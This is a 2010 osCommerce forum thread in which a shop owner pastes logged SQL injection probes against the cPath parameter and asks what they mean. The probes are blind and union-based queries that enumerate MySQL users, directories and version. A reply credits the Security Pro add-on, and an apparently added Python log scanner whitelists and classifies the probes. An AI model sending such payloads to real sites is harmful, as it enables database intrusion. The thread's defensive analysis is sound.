tigergirl Posted February 3, 2010

Wow, got a shock when I saw this in who's online:

/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E88%20and%201=1
/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3C=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E144%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(@@tmpdir)%20%20)=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(@@datadir)%20%20)%3E144%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(@@basedir)%20%20)=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(current_user())%20%20)%3E39%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(session_user())%20%20)%3C=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(user())%20%20)%3E32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(version())%20%20)=32%20and%201=1
/index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615
/index.php?cPath=31%20and%20(select%20char_length(version())%20%20)%3E144%20and%201=1
/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1
/index.php?cPath=31%20/*!49999%20and%201=2*/--
/index.php?cPath=31%20and%201=2%20union%20select%201--
/index.php?cPath=31%20and%201=2%20union%20select%20char(97,98,97,98,97,97,97,98,98,98,97,99,97)--
/index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e/*%20and%201=1

And there were a lot more entries than that. What are they trying to do though? Security Pro is sanitizing this, isn't it? Or should I be worried? IP trap is going on my priority list and I think it's the only thing I haven't implemented from the stickied security topic.

I'm feeling lucky today......maybe someone will answer my post! I do try and answer a simple post when I can just to give something back.
------------------------------------------------
PM me? - I'm not for hire
♥FWR Media Posted February 3, 2010

> Wow, got a shock when I saw this in who's online:
>
> /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E88%20and%201=1
> /index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3C=32%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E144%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(@@tmpdir)%20%20)=32%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(@@datadir)%20%20)%3E144%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(@@basedir)%20%20)=32%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(current_user())%20%20)%3E39%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(session_user())%20%20)%3C=32%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(user())%20%20)%3E32%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(version())%20%20)=32%20and%201=1
> /index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615
> /index.php?cPath=31%20and%20(select%20char_length(version())%20%20)%3E144%20and%201=1
> /index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1
> /index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1
> /index.php?cPath=31%20/*!49999%20and%201=2*/--
> /index.php?cPath=31%20and%201=2%20union%20select%201--
> /index.php?cPath=31%20and%201=2%20union%20select%20char(97,98,97,98,97,97,97,98,98,98,97,99,97)--
> /index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e/*%20and%201=1
>
> And there were a lot more entries than that. What are they trying to do though? Security Pro is sanitizing this, isn't it? Or should I be worried? IP trap is going on my priority list and I think it's the only thing I haven't implemented from the stickied security topic.

Every one of those injection attacks uses illegal characters that would be stripped by Security Pro.

Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls
KissMT Dynamic SEO Meta & Canonical Header Tags
KissER Error Handling and Debugging
KissIT Image Thumbnailer
Security Pro - Querystring protection against hackers ( a KISS contribution )
If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work.
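To make the two posts above concrete, here is an added example (my own code, not part of this thread and not Security Pro's code) that decodes the `cPath` value from request paths like the ones pasted above, checks it against a whitelist of what a real osCommerce category path looks like (assumed here to be digits joined by underscores), and tags any rejected value with the kind of probe it resembles for the log review. The signature list is illustrative, and the sample log lines are constructed from the thread; the whitelist is the actual control, the tags only explain what a reviewer is looking at.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample: request paths of the kind quoted in the thread,
# plus two legitimate cPath values for contrast.
SAMPLE_LOG = [
    "/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1",
    "/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1",
    "/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1",
    "/index.php?cPath=31%20/*!49999%20and%201=2*/--",
    "/index.php?cPath=31%20and%201=2%20union%20select%201--",
    "/index.php?cPath=31_45",   # nested category path, legitimate
    "/index.php?cPath=31",      # legitimate
]

# Assumption: a valid osCommerce cPath is one or more category ids joined by "_".
CPATH_OK = re.compile(r"^\d+(?:_\d+)*$")

# Illustrative signatures used only to label rejected values in a report.
# Several patterns share a label; labels are de-duplicated in classify().
SIGNATURES = [
    ("union-based", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("blind/boolean", re.compile(r"\b(?:and|or)\b\s*\(?\s*select\b", re.I)),
    ("blind/boolean", re.compile(r"\b(?:and|or)\b\s*1\s*=\s*[12]\b", re.I)),
    ("mysql-comment", re.compile(r"/\*!?\d*|\*/|--\s*$")),
    ("server-info-probe", re.compile(
        r"@@\w+|\b(?:version|database|user|current_user|session_user)\s*\(\s*\)",
        re.I)),
]


def decode_cpath(request_path: str) -> Optional[str]:
    """Return the percent-decoded cPath value from a request path, or None."""
    params = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
    values = params.get("cPath")
    return values[0] if values else None


def classify(value: str) -> list:
    """Labels describing which probe patterns the decoded value matches."""
    tags = []
    for name, pattern in SIGNATURES:
        if name not in tags and pattern.search(value):
            tags.append(name)
    return tags


def inspect_request(request_path: str) -> dict:
    """Whitelist-check cPath; only rejected values get classified."""
    value = decode_cpath(request_path)
    valid = value is not None and bool(CPATH_OK.fullmatch(value))
    return {"cPath": value, "valid": valid,
            "tags": [] if valid else classify(value or "")}


def scan(lines) -> list:
    """All requests whose cPath fails the whitelist, for the log review."""
    return [r for r in (inspect_request(line) for line in lines) if not r["valid"]]


def strip_to_whitelist(value: str) -> str:
    """Strip-illegal-characters approach (as the reply describes Security Pro
    doing): everything outside [0-9_] is dropped. The result is harmless to
    the query but is no longer a meaningful category path."""
    return re.sub(r"[^0-9_]", "", value)


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["tags"], repr(finding["cPath"]))
```

Two points worth taking from running it: rejecting (or redirecting on) a `cPath` that fails the whitelist is stricter and easier to reason about than stripping characters, because stripping `31 and 1=2 union select 1--` yields `31121`, a value that is safe for the database but refers to nothing the shop has; and the length-comparison probes in the thread (`char_length(...) > 60`, `ascii(substr(@@datadir,1,1)) = 47`) are the signature of blind, boolean-based enumeration, which is why the same URL appears many times with only the number changing.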
tigergirl (Author) Posted February 3, 2010

> Every one of those injection attacks uses illegal characters that would be stripped by Security Pro.

OK, well I sure am glad you made such a fantastic mod and that I installed it ages ago! I haven't had a single problem with it at all..... Thanks Rob. :D

I'm feeling lucky today......maybe someone will answer my post! I do try and answer a simple post when I can just to give something back.
------------------------------------------------
PM me? - I'm not for hire